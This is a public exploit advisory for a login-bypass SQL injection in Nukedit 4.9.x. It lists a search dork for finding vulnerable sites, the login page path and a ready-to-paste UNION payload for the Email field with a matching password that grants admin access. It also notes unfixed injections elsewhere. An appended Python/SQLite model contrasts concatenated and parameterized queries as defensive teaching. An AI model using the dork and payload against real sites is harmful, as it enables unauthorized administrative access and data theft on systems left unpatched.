Nukedit 4.9.x login bypass via SQL injection, discovered by r3dm0v3 from Tehran, Iran. Vulnerable versions: 4.9.x and prior. Remotely exploitable; the advisory includes a PoC and notes further SQL injections in other pages.
`#Title: Nukedit 4.9.x Login Bypass SQL injection
#
#Discovered By: r3dm0v3
# http://r3dm0v3.persianblog.ir
# r3dm0v3( 4t ) yahoo [dot] com
# Tehran - Iran
#
#Download: http://www.nukedit.com/content/Download.asp
#Vulnerable: 4.9.x, prior versions may be vulnerable
#Remote: Yes
#Dork: "Powered by Nukedit"
# inurl:utilities/login.asp
#Fix: Not Available
#POC:
#Go to http://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below:
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
#Password: r3dm0v3
#Click Login and you will get in as an admin.
#There are some other SQL injections in other pages.`
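The advisory lists no fix, so the following added example (not Nukedit's code and not the author's) models the login lookup in Python with SQLite and contrasts a concatenated query with one that binds the email as a parameter. The four-column table, the `ENC` + SHA-256 storage format and every function name are assumptions made for this model.

```python
import hashlib
import hmac
import sqlite3


def enc(password):
    # Assumed storage format for this model: "ENC" + SHA-256 hex digest.
    return "ENC" + hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Simplified stand-in for tblusers (constructed data, four columns).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblusers (id INTEGER, email TEXT, username TEXT, password TEXT)")
    db.execute("INSERT INTO tblusers VALUES (1, 'admin@example.test', 'admin', ?)",
               (enc("constructed-admin-secret"),))
    return db


def login_concat(db, email, password):
    # Vulnerable pattern: the email field is spliced into the SQL text, so a
    # quote in it closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, email, username, password FROM tblusers "
           "WHERE email = '" + email + "'")
    row = db.execute(sql).fetchone()
    return row is not None and row[3] == enc(password)


def login_param(db, email, password):
    # Hardened pattern: the email is a bound parameter and is only ever
    # compared as data; the stored hash is checked in constant time.
    if not isinstance(email, str) or len(email) > 254:
        return False
    row = db.execute("SELECT password FROM tblusers WHERE email = ?",
                     (email,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], enc(password))


def union_probe(password):
    # Constructed regression input with the same shape as the advisory's
    # Email value, scaled down to this model's four columns.
    return ("' union select 1,1,'x','" + enc(password)
            + "' from tblusers where 'x'='x")
```

In classic ASP the same binding is done with an `ADODB.Command` object and `CreateParameter` rather than string concatenation.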